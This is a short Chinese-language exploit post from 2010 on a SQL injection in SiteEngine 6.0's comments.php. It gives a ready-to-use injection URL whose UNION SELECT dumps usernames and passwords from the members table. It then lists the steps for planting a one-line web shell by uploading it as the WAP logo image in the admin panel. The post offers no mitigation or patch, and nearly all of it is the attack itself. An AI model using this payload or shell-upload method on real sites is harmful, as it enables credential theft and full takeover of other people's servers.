SiteEngine 6.0 SQL注入漏洞

发布日期：2010-11.26
发布作者：Beach

影响版本：SiteEngine 6.0
官方地址：http://www.siteengine.net/

漏洞类型：SQL注入
漏洞描述：利用这个漏洞需要评论功能开启(默认开启)

[*]利用:

http://server/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,group_concat(username,0x3a,password,0x3c62723e),4,5, ... ,24,25,26+from+boka_members%23

[*]上Shell:

管理后台: http://server/admin/
系统维护---> wap设置---> 请上传wap logo图 (有大小限制,10k以内,传一句话即可) --->
确定--->马上浏览--->看图片属性即为一句话地址

标签分类： SQL注入